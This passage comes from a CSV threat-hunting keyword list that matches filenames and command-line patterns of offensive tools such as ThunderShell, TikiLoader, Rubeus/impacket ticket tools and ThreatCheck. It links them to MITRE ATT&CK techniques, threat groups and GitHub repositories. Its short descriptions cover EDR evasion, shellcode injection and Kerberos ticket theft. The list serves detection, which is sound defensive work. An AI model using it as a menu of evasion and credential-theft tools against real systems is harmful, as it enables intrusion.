- T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/aeverj/NimShellCodeLoader,1,1,N/A,10,10,555,105,2023-08-26T12:48:08Z,2021-01-19T15:57:01Z -*ThreadlessInject* -p * -d *,offensive_tool_keyword,ThreadlessInject,Threadless Process Injection using remote function hooking.,T1055.012 - T1055.003 - T1177,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/CCob/ThreadlessInject,1,0,N/A,10,6,552,55,2023-02-23T10:23:56Z,2023-02-05T13:50:15Z -*ThreadlessInject.exe*,offensive_tool_keyword,ThreadlessInject,Threadless Process Injection using remote function hooking.,T1055.012 - T1055.003 - T1177,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/CCob/ThreadlessInject,1,1,N/A,10,6,552,55,2023-02-23T10:23:56Z,2023-02-05T13:50:15Z -*ThreadlessInject-master*,offensive_tool_keyword,ThreadlessInject,Threadless Process Injection using remote function hooking.,T1055.012 - T1055.003 - T1177,TA0004 - TA0005,N/A,N/A,Defense 
Evasion,https://github.com/CCob/ThreadlessInject,1,1,N/A,10,6,552,55,2023-02-23T10:23:56Z,2023-02-05T13:50:15Z -*threads all alertable*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*ThreadStackSpoofer*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,1,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*ThreatCheck.csproj*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z 
-*ThreatCheck.csproj*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*ThreatCheck.exe*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*ThreatCheck.exe*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*ThreatCheck-master*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,1,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -*threatexpress*,offensive_tool_keyword,Github Username,github repo hosting post exploitation tools,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/threatexpress,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*threatexpress*malleable*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 
- T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,1,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*threatexpress/cs2modrewrite*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*ThunderDNS*.php*,offensive_tool_keyword,ThunderDNS,This tool can forward TCP traffic over DNS protocol,T1095 - 
T1071.004,TA0011 - TA0003,N/A,N/A,C2,https://github.com/fbkcs/ThunderDNS,1,1,N/A,10,10,405,60,2019-12-24T12:41:17Z,2018-12-04T15:18:47Z -*ThunderDNS*.ps1*,offensive_tool_keyword,ThunderDNS,This tool can forward TCP traffic over DNS protocol,T1095 - T1071.004,TA0011 - TA0003,N/A,N/A,C2,https://github.com/fbkcs/ThunderDNS,1,1,N/A,10,10,405,60,2019-12-24T12:41:17Z,2018-12-04T15:18:47Z -*ThunderDNS*.py*,offensive_tool_keyword,ThunderDNS,This tool can forward TCP traffic over DNS protocol,T1095 - T1071.004,TA0011 - TA0003,N/A,N/A,C2,https://github.com/fbkcs/ThunderDNS,1,1,N/A,10,10,405,60,2019-12-24T12:41:17Z,2018-12-04T15:18:47Z -*ThunderDNS.git*,offensive_tool_keyword,ThunderDNS,This tool can forward TCP traffic over DNS protocol,T1095 - T1071.004,TA0011 - TA0003,N/A,N/A,C2,https://github.com/fbkcs/ThunderDNS,1,1,N/A,10,10,405,60,2019-12-24T12:41:17Z,2018-12-04T15:18:47Z -*ThunderFox.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*ThunderShell*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,0,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*ThunderShell.git*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*ThunderShell.py*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*ThunderShell-master.zip*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*thycotic_secretserver_dump.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*tiagorlampert*,offensive_tool_keyword,Github Username,github repo username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/tiagorlampert,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ticket.kirbi*,offensive_tool_keyword,mimikatz,Mimikatz Unconstrained delegation. With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. 
we can impersonate the victim user towards any service in the domain.,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*ticket.kirbi*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -*ticketConverter.py *.ccache *,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 
- TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -*ticketConverter.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ticketer.py -nthash*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ticketer.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*ticketsplease adfs *,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*ticketsplease azure *,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*ticketsplease dcsync *,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*ticketsplease ldap *,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*ticketsplease saml *,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*ticketsplease ticket --domain*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential 
Access,https://github.com/secureworks/whiskeysamlandfriends,1,0,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*ticketsplease.modules.*,offensive_tool_keyword,whiskeysamlandfriends,GoldenSAML Attack Libraries and Framework,T1606.002,TA0006,N/A,N/A,Credential Access,https://github.com/secureworks/whiskeysamlandfriends,1,1,N/A,N/A,1,54,11,2021-11-05T21:59:51Z,2021-11-04T15:30:12Z -*TicketToHashcat.py*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*TicketToHashcat.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*Tiger-192.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*tijme/kernel-mii*,offensive_tool_keyword,cobaltstrike,Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 
- T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tijme/kernel-mii,1,1,N/A,10,10,72,27,2023-05-07T18:38:29Z,2022-06-25T11:13:45Z -*TikiLoader*Hollower*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiLoader.*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiLoader.*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - 
TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*TikiLoader.dll*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,1,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*TikiLoader.dll*,offensive_tool_keyword,cobaltstrike,EDR Evasion - 
